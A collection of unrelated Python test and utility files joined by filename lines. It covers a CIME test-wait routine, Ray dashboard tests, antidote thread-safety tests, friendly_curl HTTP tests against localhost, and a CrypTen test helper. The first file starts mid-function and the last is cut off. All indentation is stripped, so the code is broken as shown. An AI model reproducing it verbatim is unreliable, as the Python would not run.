log_fd.write(ts.phase_statuses_dump())
log_fd.write("OVERALL: {}\n\n".format(test_status))
prior_ts = ts
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False, no_run=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise CIMEError("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False,
no_run=False,
update_success=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if update_success:
caseroot = os.path.dirname(test_data[0])
with Case(caseroot, read_only=True) as case:
srcroot = case.get_value("CIMEROOT")
baseline_root = case.get_value("BASELINE_ROOT")
save_test_success(baseline_root, srcroot, test_name, test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS])
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
|
test_stats_collector.py
|
import os
import sys
import logging
import requests
import time
import traceback
import random
import pytest
import ray
import redis
import threading
import ray.new_dashboard.modules.stats_collector.stats_collector_consts \
as stats_collector_consts
import ray.new_dashboard.utils as dashboard_utils
import ray.ray_constants as ray_constants
from datetime import datetime, timedelta
from ray.cluster_utils import Cluster
from ray.new_dashboard.tests.conftest import * # noqa
from ray.test_utils import (format_web_url, wait_until_server_available,
wait_for_condition,
wait_until_succeeded_without_exception)
logger = logging.getLogger(__name__)
def test_node_info(disable_aiohttp_cache, ray_start_with_dashboard):
@ray.remote
class Actor:
def getpid(self):
return os.getpid()
actors = [Actor.remote(), Actor.remote()]
actor_pids = [actor.getpid.remote() for actor in actors]
actor_pids = set(ray.get(actor_pids))
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
webui_url = format_web_url(webui_url)
node_id = ray_start_with_dashboard["node_id"]
timeout_seconds = 10
start_time = time.time()
last_ex = None
while True:
time.sleep(1)
try:
response = requests.get(webui_url + "/nodes?view=hostnamelist")
response.raise_for_status()
hostname_list = response.json()
assert hostname_list["result"] is True, hostname_list["msg"]
hostname_list = hostname_list["data"]["hostNameList"]
assert len(hostname_list) == 1
hostname = hostname_list[0]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["hostname"] == hostname
assert detail["raylet"]["state"] == "ALIVE"
assert "raylet" in detail["cmdline"][0]
assert len(detail["workers"]) >= 2
assert len(detail["actors"]) == 2, detail["actors"]
assert len(detail["raylet"]["viewData"]) > 0
actor_worker_pids = set()
for worker in detail["workers"]:
if "ray::Actor" in worker["cmdline"][0]:
actor_worker_pids.add(worker["pid"])
assert actor_worker_pids == actor_pids
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
assert len(summary["data"]["summary"]) == 1
summary = summary["data"]["summary"][0]
assert summary["hostname"] == hostname
assert summary["raylet"]["state"] == "ALIVE"
assert "raylet" in summary["cmdline"][0]
assert "workers" not in summary
assert "actors" not in summary
assert "viewData" not in summary["raylet"]
break
except Exception as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
def test_memory_table(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
@ray.remote
class ActorWithObjs:
def __init__(self):
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
my_obj = ray.put([1, 2, 3] * 100) # noqa
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
results = ray.get([actor.get_obj.remote() for actor in actors]) # noqa
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
resp = requests.get(
webui_url + "/memory/set_fetch", params={"shouldFetch": "true"})
resp.raise_for_status()
def check_mem_table():
resp = requests.get(f"{webui_url}/memory/memory_table")
resp_data = resp.json()
assert resp_data["result"]
latest_memory_table = resp_data["data"]["memoryTable"]
summary = latest_memory_table["summary"]
# 1 ref per handle and per object the actor has a ref to
assert summary["totalActorHandles"] == len(actors) * 2
# 1 ref for my_obj
assert summary["totalLocalRefCount"] == 1
wait_until_succeeded_without_exception(
check_mem_table, (AssertionError, ), timeout_ms=1000)
def test_get_all_node_details(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
@ray.remote
class ActorWithObjs:
def __init__(self):
print("I also log a line")
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
timeout_seconds = 20
start_time = time.time()
last_ex = None
def check_node_details():
resp = requests.get(f"{webui_url}/nodes?view=details")
resp_json = resp.json()
resp_data = resp_json["data"]
clients = resp_data["clients"]
node = clients[0]
assert len(clients) == 1
assert len(node.get("actors")) == 2
# Workers information should be in the detailed payload
assert "workers" in node
assert "logCount" in node
# Two lines printed by ActorWithObjs
# One line printed by autoscaler: monitor.py:118 -- Monitor: Started
assert node["logCount"] > 2
print(node["workers"])
assert len(node["workers"]) == 2
assert node["workers"][0]["logCount"] == 1
while True:
time.sleep(1)
try:
check_node_details()
break
except (AssertionError, KeyError, IndexError) as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_nodes_info(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
cluster.add_node()
cluster.add_node()
def _check_nodes():
try:
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
summary = summary["data"]["summary"]
assert len(summary) == 3
for node_info in summary:
node_id = node_info["raylet"]["nodeId"]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["raylet"]["state"] == "ALIVE"
response = requests.get(webui_url + "/test/dump?key=agents")
response.raise_for_status()
agents = response.json()
assert len(agents["data"]["agents"]) == 3
return True
except Exception as ex:
logger.info(ex)
return False
wait_for_condition(_check_nodes, timeout=15)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_node_churn(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = format_web_url(cluster.webui_url)
def cluster_chaos_monkey():
worker_nodes = []
while True:
time.sleep(5)
if len(worker_nodes) < 2:
worker_nodes.append(cluster.add_node())
continue
should_add_node = random.randint(0, 1)
if should_add_node:
worker_nodes.append(cluster.add_node())
else:
node_index = random.randrange(0, len(worker_nodes))
node_to_remove = worker_nodes.pop(node_index)
cluster.remove_node(node_to_remove)
def get_index():
resp = requests.get(webui_url)
resp.raise_for_status()
def get_nodes():
resp = requests.get(webui_url + "/nodes?view=summary")
resp.raise_for_status()
summary = resp.json()
assert summary["result"] is True, summary["msg"]
assert summary["data"]["summary"]
t = threading.Thread(target=cluster_chaos_monkey, daemon=True)
t.start()
t_st = datetime.now()
duration = timedelta(seconds=60)
while datetime.now() < t_st + duration:
get_index()
time.sleep(2)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la2 = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
la2_pid = str(ray.get(la2.get_pid.remote()))
ray.get(la.go.remote(4))
ray.get(la2.go.remote(1))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert type(node_logs["data"]["logs"]) is dict
assert all(
pid in node_logs["data"]["logs"] for pid in (la_pid, la2_pid))
assert len(node_logs["data"]["logs"][la2_pid]) == 1
actor_one_logs_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(la_pid)
})
actor_one_logs_response.raise_for_status()
actor_one_logs = actor_one_logs_response.json()
assert actor_one_logs["result"]
assert type(actor_one_logs["data"]["logs"]) is dict
assert len(actor_one_logs["data"]["logs"][la_pid]) == 4
wait_until_succeeded_without_exception(
check_logs, (AssertionError), timeout_ms=1000)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_errors(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class ErrorActor():
def go(self):
raise ValueError("This is an error")
def get_pid(self):
return os.getpid()
ea = ErrorActor.remote()
ea_pid = ea.get_pid.remote()
ea.go.remote()
def check_errs():
node_errs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_errs_response.raise_for_status()
node_errs = node_errs_response.json()
assert node_errs["result"]
assert type(node_errs["data"]["errors"]) is dict
assert ea_pid in node_errs["data"]["errors"]
assert len(node_errs["data"]["errors"][ea_pid]) == 1
actor_err_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(ea_pid)
})
actor_err_response.raise_for_status()
actor_errs = actor_err_response.json()
assert actor_errs["result"]
assert type(actor_errs["data"]["errors"]) is dict
assert len(actor_errs["data"]["errors"][ea_pid]) == 4
wait_until_succeeded_without_exception(
check_errs, (AssertionError), timeout_ms=1000)
def test_nil_node(enable_test_module, disable_aiohttp_cache,
ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
assert wait_until_server_available(webui_url)
webui_url = format_web_url(webui_url)
@ray.remote(num_gpus=1)
class InfeasibleActor:
pass
infeasible_actor = InfeasibleActor.remote() # noqa
timeout_seconds = 5
start_time = time.time()
last_ex = None
while True:
time.sleep(1)
try:
resp = requests.get(f"{webui_url}/logical/actors")
resp_json = resp.json()
resp_data = resp_json["data"]
actors = resp_data["actors"]
assert len(actors) == 1
response = requests.get(webui_url + "/test/dump?key=node_actors")
response.raise_for_status()
result = response.json()
assert stats_collector_consts.NIL_NODE_ID not in result["data"][
"nodeActors"]
break
except Exception as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
def test_actor_pubsub(disable_aiohttp_cache, ray_start_with_dashboard):
timeout = 5
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
address_info = ray_start_with_dashboard
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
p = client.pubsub(ignore_subscribe_messages=True)
p.psubscribe(ray.gcs_utils.RAY_ACTOR_PUBSUB_PATTERN)
@ray.remote
class DummyActor:
def __init__(self):
pass
# Create a dummy actor.
a = DummyActor.remote()
def handle_pub_messages(client, msgs, timeout, expect_num):
start_time = time.time()
while time.time() - start_time < timeout and len(msgs) < expect_num:
msg = client.get_message()
if msg is None:
time.sleep(0.01)
continue
pubsub_msg = ray.gcs_utils.PubSubMessage.FromString(msg["data"])
actor_data = ray.gcs_utils.ActorTableData.FromString(
pubsub_msg.data)
msgs.append(actor_data)
msgs = []
handle_pub_messages(p, msgs, timeout, 2)
# Assert we received published actor messages with state
# DEPENDENCIES_UNREADY and ALIVE.
assert len(msgs) == 2
# Kill actor.
ray.kill(a)
handle_pub_messages(p, msgs, timeout, 3)
# Assert we received published actor messages with state DEAD.
assert len(msgs) == 3
def actor_table_data_to_dict(message):
return dashboard_utils.message_to_dict(
message, {
"actorId", "parentId", "jobId", "workerId", "rayletId",
"actorCreationDummyObjectId", "callerId", "taskId",
"parentTaskId", "sourceActorId", "placementGroupId"
},
including_default_value_fields=False)
non_state_keys = ("actorId", "jobId", "taskSpec")
for msg in msgs:
actor_data_dict = actor_table_data_to_dict(msg)
# DEPENDENCIES_UNREADY is 0, which would not be keeped in dict. We
# need check its original value.
if msg.state == 0:
assert len(actor_data_dict) > 5
for k in non_state_keys:
assert k in actor_data_dict
# For status that is not DEPENDENCIES_UNREADY, only states fields will
# be published.
elif actor_data_dict["state"] in ("ALIVE", "DEAD"):
assert actor_data_dict.keys() == {
"state", "address", "timestamp", "pid", "creationTaskException"
}
else:
raise Exception("Unknown state: {}".format(
actor_data_dict["state"]))
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
test_thread_safety.py
|
import random
import threading
import time
import pytest
from antidote import Tagged, factory, new_container
from antidote.core import DependencyContainer
from antidote.providers.tag import TaggedDependencies
class Service:
pass
class AnotherService:
pass
def make_delayed_factory(service, a=0.01, b=0.01):
def f() -> service:
time.sleep(a + b * random.random())
return service()
return f
@pytest.fixture()
def container():
c = new_container()
c.update_singletons({Service: Service(), 'parameter': object()})
return c
def multi_thread_do(target, n_threads=10):
threads = [threading.Thread(target=target)
for _ in range(n_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_container_instantiation_safety(container: DependencyContainer):
n_threads = 10
factory(make_delayed_factory(Service),
singleton=True,
container=container)
factory(make_delayed_factory(AnotherService),
singleton=False,
container=container)
singleton_got = []
non_singleton_got = []
def worker():
singleton_got.append(container.get(Service))
non_singleton_got.append(container.get(AnotherService))
multi_thread_do(worker, n_threads)
assert 1 == len(set(singleton_got))
assert n_threads == len(set(non_singleton_got))
def test_tagged_dependencies_instantiation_safety(container: DependencyContainer):
n_dependencies = 40
for i in range(n_dependencies):
factory(make_delayed_factory(type('Service{}'.format(i), (object,), {})),
singleton=False,
tags=['test'],
container=container)
tagged = container.get(Tagged('test')) # type: TaggedDependencies
dependencies = []
def worker():
for i, dep in enumerate(tagged.instances()):
dependencies.append((i, dep))
multi_thread_do(worker)
assert n_dependencies == len(set(dependencies))
assert set(dependencies) == set(enumerate(tagged.instances()))
|
test_curlhttpconnection.py
|
"""Unit tests for CurlHTTPConnections."""
from cStringIO import StringIO
import unittest
import BaseHTTPServer
import threading
import tempfile
import pycurl
from friendly_curl import CurlHTTPConnection
from friendly_curl import CurlHTTPResponse
try:
import httplib2
except ImportError:
httplib2 = None
class TestCurlHTTPConnection(unittest.TestCase):
def testSuccessfulGet(self):
"""Test a basic get request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', '/index.html?foo=bar')
resp = con.getresponse()
self.assertEqual(resp.status, 200, 'Unexpected HTTP status.')
self.assertEqual(resp.getheader('content-type'), 'text/html',
'Unexpected Content-Type from server.')
self.assertEqual(resp.read(), 'This is a test line.\n',
'Incorrect content returned by server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
def testSuccessfulGetWithHeaders(self):
"""Test a basic get request with headers"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', '/index.html?foo=bar', headers={'SHAZAM': 'Marvellous'})
resp = con.getresponse()
self.assertEqual(self.request_handler.headers['SHAZAM'], 'Marvellous',
'Test request header not found on server.')
thread.join()
def testErrorGet(self):
"""Test a get request that causes an error"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_error(404)
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', '/index.html?foo=bar')
resp = con.getresponse()
self.assertEqual(resp.status, 404, 'Unexpected HTTP status.')
self.assertEqual(resp.getheader('content-type'), 'text/html',
'Unexpected Content-Type from server.')
self.assert_('<p>Error code 404.' in resp.read(),
'Unexpected error document from server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
def testPostData(self):
"""Test a basic post request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_POST(self):
self.test_object.request_handler = self
self.test_object.post_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
# Do this here so test_thread sees it after it drops out of
# handle_request after curl makes its request.
runThread = False
con.request('POST', '/post_target', body='foo=bar&baz=garply\r\n')
resp = con.getresponse()
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.post_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/post_target',
'Incorrect path on server.')
thread.join()
def testPutData(self):
"""Test a basic put request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_PUT(self):
self.test_object.request_handler = self
# CURL's put uses transfer-encoding chunked by default.
chunk_size = int(self.rfile.readline(), 16)
self.test_object.put_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('PUT', '/put_target', body='foo=bar&baz=garply\r\n')
resp = con.getresponse()
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.put_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/put_target',
'Incorrect path on server.')
thread.join()
def testDelete(self):
"""Test a delete request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_DELETE(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('DELETE', '/del_target')
resp = con.getresponse()
self.assertEqual(self.request_handler.path, '/del_target',
'Incorrect path on server.')
thread.join()
def testHttpLib2GET(self):
"""Test integration with httplib2 when making a GET request."""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://localhost:6110/index.html?foo=bar',
method='GET', connection_type=CurlHTTPConnection)
self.assertEqual(resp.status, 200, 'Unexpected HTTP status.')
self.assertEqual(resp['content-type'], 'text/html',
'Unexpected Content-Type from server.')
self.assertEqual(content, 'This is a test line.\n',
'Incorrect content returned by server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
def testHttpLib2GETHeaders(self):
"""Test integration with httplib2 by making a get request with headers."""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://127.0.0.1:6110/index.html?foo=bar', method='GET',
headers={'SHAZAM': 'Marvellous'},
connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.headers['SHAZAM'], 'Marvellous',
'Test request header not found on server.')
thread.join()
def testHttpLib2POST(self):
"""Test a post request through httplib2."""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_POST(self):
self.test_object.request_handler = self
self.test_object.post_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://127.0.0.1:6110/post_target', method='POST',
body='foo=bar&baz=garply\r\n', connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.post_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/post_target',
'Incorrect path on server.')
thread.join()
def testHttpLib2PUT(self):
"""Test a put request through httplib2"""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_PUT(self):
self.test_object.request_handler = self
# CURL's put uses transfer-encoding chunked by default.
chunk_size = int(self.rfile.readline(), 16)
self.test_object.put_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://127.0.0.1:6110/put_target', method='PUT',
body='foo=bar&baz=garply\r\n', connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.put_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/put_target',
'Incorrect path on server.')
thread.join()
def testHttpLib2DELETE(self):
"""Test a delete request"""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_DELETE(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
# Do this here so test_thread sees it after it drops out of
# handle_request after curl makes its request.
runThread = False
httpcon.request(
uri='http://127.0.0.1:6110/del_target', method='DELETE',
connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.path, '/del_target',
'Incorrect path on server.')
thread.join()
def testSuccessfulGetWithUnicodeUri(self):
"""Test a basic get request with a unicode object passed to con.request."""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', u'/index.html?foo=bar')
resp = con.getresponse()
self.assertEqual(resp.status, 200, 'Unexpected HTTP status.')
self.assertEqual(resp.getheader('content-type'), 'text/html',
'Unexpected Content-Type from server.')
self.assertEqual(resp.read(), 'This is a test line.\n',
'Incorrect content returned by server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
|
multiprocess_test_case.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing
import os
import sys
import tempfile
import traceback
import unittest
import warnings
from functools import wraps
import crypten.communicator as comm
import crypten.debug
import torch
import torch.distributed as dist
def get_random_test_tensor(
max_value=6, min_value=None, size=(1, 5), is_float=False, ex_zero=False, device=None
):
"""Generates random tensor for testing
Args:
max_value (int): defines maximum value for int tensor
min_value (int): defines minimum value for int tensor
size (tuple): size of tensor
is_float (bool): determines float or int tensor
ex_zero (bool): excludes zero tensor
Returns: torch.tensor
"""
if min_value is None:
min_value = -max_value
if is_float:
tensor = (
torch.rand(torch.Size(size), device=device) * (max_value - min_value)
+ min_value
)
else:
tensor = torch.randint(
min_value, max_value, torch.Size(size), dtype=torch.int64, device=device
)
if ex_zero:
# replace 0 with 1
tensor[tensor == 0] = 1
# Broadcast this tensor to the world so that the generated random tensor
# is in sync in all distributed processes. See T45688819 for more
# information.
tensor = comm.get().broadcast(tensor, 0)
return tensor
def onehot(indices, num_targets=None):
"""
Converts index vector into one-hot matrix.
"""
assert indices.dtype == torch.long, "indices must be long integers"
assert indices.min() >= 0, "indices must be non-negative"
if num_targets is None:
num_targets = indices.max() + 1
onehot_vector = torch.zeros(indices.nelement(), num_targets, dtype=torch.long)
onehot_vector.scatter_(1, indices.view(indices.nelement(), 1), 1)
return onehot_vector
def get_random_linear(in_channels, out_channels):
linear = torch.nn.Linear(in_channels, out_channels)
